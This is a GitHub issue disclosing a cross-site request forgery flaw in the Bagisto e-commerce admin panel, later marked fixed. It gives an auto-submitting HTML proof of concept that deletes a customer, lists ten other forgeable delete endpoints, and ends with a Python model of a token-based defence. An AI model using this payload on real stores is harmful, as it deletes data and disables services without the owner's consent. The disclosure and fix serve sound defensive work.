Cross site request forgery #750

Closed
VikramRajVashisth opened this issue Mar 27, 2019 · 1 comment
Labels: Bug Fixed (When bug issue is fixed.), Critical (Something critical. Need immediate access.)

Comments

@VikramRajVashisth

Vulnerable link: https://demo.bagisto.com/bagisto-103-206-131-18/admin/

What is CSRF?
A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application.
Vulnerable Page: Admin Panel menu
[screenshot: cs1]

Task: To remove items from a table without the account owner's consent.
How to detect the vulnerability?
It is fairly easy to detect a CSRF vulnerability via automated tools or code analysis. Here, we will directly look at the href URLs of the Delete button, which submits the value without a CSRF token, using Inspect Element in the browser.

How to reproduce the attack?
Step 1: Admin (victim) signs into the Bagisto admin panel and does not sign off or close the browser.
Step 2: Admin (victim) opens a tab to an attacker-controlled website whose auto-loaded request contains the information the attacker wants to delete; the request is sent to the Bagisto server, and the evil script auto-loads to delete items from the list.
Step 3: The browser executes the evil script on the attacker's behalf and updates the list.

Malicious page containing the evil script to edit the list:
1.1) Delete users on admin panel: No CSRF token is used on the customer delete button.
The attacker needs to send a link to a page containing the code below, which will be executed when opened in the victim's browser.


<html>
<body onload="document.forms[0].submit()">
<form method="get" action="https://demo.bagisto.com/bagisto-103-206-131-18/admin/customers/delete/10">
<!-- Field -->
<input value="Save Changes" type="submit">
</form>
</body>
</html>

1.2) Deleting review on admin panel:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/reviews/delete/4
1.3) Deleting group:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/groups/delete/1
1.4) Locales:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/locales/delete/2
1.5) Currencies:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/currencies/delete/2
1.6) Exchange rates:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/exchange_rates/delete/2
1.7) Inventory sources:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/inventory_sources/delete/1
1.8) Channels:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/channels/delete/1
1.9) Users:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/users/delete/1
1.10) Sliders:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/slider/delete/1

Impacts of the vulnerability:
Using this flaw an attacker can remove important functionality of the application, which results in denial of most of the services on the store.

Prevention cheat sheet for developers:
https://www.incapsula.com/web-application-security/csrf-cross-site-request-forgery.html
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
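The report above shows the two properties that make these routes forgeable: the delete is bound to a GET link, and nothing in the request proves it came from the admin's own page rather than from a page the attacker controls. The following is an added example (not Bagisto's code and not part of the original issue) modelling the synchronizer-token defence that closes both gaps: state changes are only accepted on an unsafe method, and only when the request carries the per-session token that the server embedded in its own rendered form. The `Session`, `Request`, handler and path names are hypothetical; the path shape is taken from the report and the record id is illustrative.

```python
"""Synchronizer-token CSRF defence, modelled as a standalone toy.
Added example; not Bagisto code. All names here are hypothetical."""
import hmac
import re
import secrets
from dataclasses import dataclass, field
from typing import Optional

# Methods that must never change server state (the "safe" methods of HTTP).
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


@dataclass
class Session:
    """Server-side session that the session cookie resolves to."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    path: str
    # The browser attaches the session cookie automatically, so a request
    # triggered from an attacker-controlled page still resolves to the
    # victim's session. That is the premise of CSRF.
    session: Optional[Session]
    form: dict = field(default_factory=dict)


def render_delete_form(session: Session, action: str) -> str:
    """Server-rendered admin page: a POST form carrying the per-session token.

    Only pages on the store's own origin can read this token, so a cross-site
    page cannot copy it into a forged request."""
    return (
        f'<form method="post" action="{action}">'
        f'<input type="hidden" name="_token" value="{session.csrf_token}">'
        '<button type="submit">Delete</button></form>'
    )


def token_from_form_html(html: str) -> str:
    """What the legitimate browser submits: the hidden field of the rendered page."""
    match = re.search(r'name="_token" value="([^"]+)"', html)
    return match.group(1) if match else ""


def csrf_token_valid(request: Request) -> bool:
    if request.session is None:
        return False
    submitted = request.form.get("_token", "")
    # Constant-time comparison so the check cannot leak the token byte by byte.
    return hmac.compare_digest(submitted.encode(), request.session.csrf_token.encode())


def delete_handler_vulnerable(request: Request, store: set) -> tuple:
    """Models the reported behaviour: a GET link deletes a record, no token checked."""
    if request.session is None:
        return 401, "login required"
    store.discard(request.path)
    return 200, "deleted"


def delete_handler_fixed(request: Request, store: set) -> tuple:
    """Hardened: unsafe method required, and the request must carry a valid token."""
    if request.session is None:
        return 401, "login required"
    if request.method in SAFE_METHODS:
        return 405, "deletes must use POST/DELETE, not GET"
    if not csrf_token_valid(request):
        return 403, "missing or invalid CSRF token"
    store.discard(request.path)
    return 200, "deleted"


def simulate() -> dict:
    """Run a forged request and the genuine one against both handlers."""
    admin = Session(user="admin")
    target = "/admin/customers/delete/10"  # path shape from the report; id illustrative

    # Forged requests: a cross-site page auto-submits a GET (as in the report)
    # or a POST; the browser adds the admin's cookie, but the attacker has no token.
    forged_get = Request("GET", target, session=admin)
    forged_post = Request("POST", target, session=admin, form={"_token": "guess"})

    # Genuine request: the admin clicks Delete on the server-rendered page.
    page = render_delete_form(admin, target)
    genuine = Request("POST", target, session=admin,
                      form={"_token": token_from_form_html(page)})

    results = {}
    for name, req in (("forged_get", forged_get), ("forged_post", forged_post),
                      ("genuine", genuine)):
        vuln_store, fixed_store = {target}, {target}  # fresh constructed record each time
        results[name] = {
            "vulnerable": delete_handler_vulnerable(req, vuln_store)[0],
            "fixed": delete_handler_fixed(req, fixed_store)[0],
            "record_survives_fixed": target in fixed_store,
        }
    return results


if __name__ == "__main__":
    for name, outcome in simulate().items():
        print(name, outcome)
```

Running `simulate()` shows the vulnerable handler deleting the record for every request that carries the cookie, while the fixed handler rejects the forged GET with 405, the forged POST with 403, and accepts only the genuine submission. In a Laravel application such as Bagisto the token check itself is provided by the framework's CSRF middleware and the `@csrf` form directive, but that middleware skips GET/HEAD/OPTIONS requests, which is why the route method matters as much as the token. A `SameSite` attribute on the session cookie is worthwhile defence in depth, not a substitute for the token.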

@jitendra-webkul jitendra-webkul added the Critical Something critical. Need immediate access. label Mar 27, 2019
@prashant-webkul prashant-webkul added the QA Passed When QA pass the pull request. label Apr 1, 2019
prashant-webkul added a commit to prashant-webkul/bagisto that referenced this issue Apr 9, 2019
@prashant-webkul prashant-webkul added Bug Fixed When bug issue is fixed. and removed QA Passed When QA pass the pull request. labels Apr 9, 2019
@jyoti-webkul (Contributor)

Framework Version: 0.1.5
Fixed
